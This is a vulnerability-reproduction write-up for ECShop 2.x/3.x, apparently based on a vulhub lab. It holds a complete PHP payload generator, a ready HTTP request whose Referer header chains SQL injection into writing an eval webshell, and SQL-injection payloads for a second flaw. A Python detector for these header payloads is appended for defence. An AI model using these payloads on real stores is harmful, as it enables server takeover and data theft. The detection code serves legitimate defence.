ECShop
1. Vulnerability reproduction
xianzhi-2017-02-82239600(vulhub)
Open http://IP:8080 and http://IP:8081 to install the 2.x and 3.x versions respectively.
For the database host enter mysql, for the password enter root.
Generate the payload with the following PHP script:
<?php
$shellname = 'shell.php';
$shellcode = '<?php @eval($_POST[1]);?>';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca'; // fixed value for 2.x
$hash3 = '45ea207d7a2b68c49582d2d22adf953a'; // value for 3.x
$webshell = base64_encode("file_put_contents('$shellname','$shellcode')");
$shell = bin2hex('{$asd\'];assert(base64_decode(\''.$webshell.'\'));//}xxx');
$id = "-1' UNION/*";
$arr = [
    'num' => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    'id'  => $id
];
$s = serialize($arr);
echo 'Payload for 2.x:<br>';
echo "{$hash2}ads|{$s}{$hash2}";
echo '<br><br>Payload for 3.x:<br>';
echo "{$hash3}ads|{$s}{$hash3}";
Capture the request to the user login page and, according to the version, add a Referer header whose value is the payload; this writes the PHP one-line webshell.
GET /user.php HTTP/1.1
Host: 192.168.135.131:8080
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:161:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f64652827634768776157356d627967702729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Upgrade-Insecure-Requests: 1
Connection: close
Webshell path: /shell.php
collection_list-sqli
Affected versions: ECShop < 4.x
Install in the same way, then register a user named hacker at /user.php.
Go to User Center -> My Favorites, capture the request, and add an X-Forwarded-Host header whose value is the payload.
Two payloads:
45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a
45ea207d7a2b68c49582d2d22adf953apay_log|s:44:"1' and updatexml(1,repeat(user(),2),1) and '";|
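As an added example (not part of the original write-up and not ECShop code): the Referer payload in the first section and the X-Forwarded-Host payloads in this one share one layout, a 32-hex-character hash, a variable name, '|' and PHP-serialized data. This Python check flags request headers that carry that layout, or SQL/PHP fragments, so a WAF rule or log review can spot the attempt; the hash value and sample requests are constructed.

```python
import re

# Layout shared by the payloads in this write-up: a 32-hex-character hash,
# a variable name, '|' and PHP-serialized data (array 'a:N:{' or string
# 's:N:"'). Legitimate Referer / X-Forwarded-Host values never look like this.
ECSHOP_PAYLOAD_RE = re.compile(
    r'^[0-9a-f]{32}[a-z_]+\|(?:a:\d+:\{|s:\d+:")', re.IGNORECASE)

# SQL and PHP fragments that have no business in either header.
SUSPICIOUS_RE = re.compile(
    r"(?:\bunion\b|\bselect\b|updatexml\s*\(|\bassert\s*\(|base64_decode|\{\$)",
    re.IGNORECASE)

def classify_header(name: str, value: str) -> str:
    """Return 'exploit', 'suspicious' or 'ok' for one request header."""
    if name.lower() not in ("referer", "x-forwarded-host"):
        return "ok"
    if ECSHOP_PAYLOAD_RE.match(value):
        return "exploit"
    if SUSPICIOUS_RE.search(value):
        return "suspicious"
    return "ok"

def scan_request(raw: str) -> list:
    """Walk the header block of a raw HTTP request, return flagged headers."""
    findings = []
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:
        if not line.strip():  # blank line ends the header block
            break
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        verdict = classify_header(name.strip(), value.strip())
        if verdict != "ok":
            findings.append((name.strip(), verdict))
    return findings

# Constructed samples: the hash is a placeholder, not the real ECShop value,
# and the serialized body is harmless.
FAKE_HASH = "0123456789abcdef0123456789abcdef"
SAMPLE_EXPLOIT = ("GET /user.php HTTP/1.1\r\nHost: shop.example\r\n"
                  "Referer: " + FAKE_HASH + 'ads|a:1:{s:3:"num";s:1:"1";}'
                  + FAKE_HASH + "\r\nConnection: close\r\n\r\n")
SAMPLE_SUSPICIOUS = ("GET /user.php?act=collection_list HTTP/1.1\r\n"
                     "Host: shop.example\r\n"
                     "X-Forwarded-Host: 1' and updatexml(1,1,1) and '\r\n\r\n")
SAMPLE_OK = ("GET /index.php HTTP/1.1\r\nHost: shop.example\r\n"
             "Referer: https://shop.example/user.php?act=collection_list\r\n\r\n")

if __name__ == "__main__":
    for sample in (SAMPLE_EXPLOIT, SAMPLE_SUSPICIOUS, SAMPLE_OK):
        print(scan_request(sample) or "clean")
```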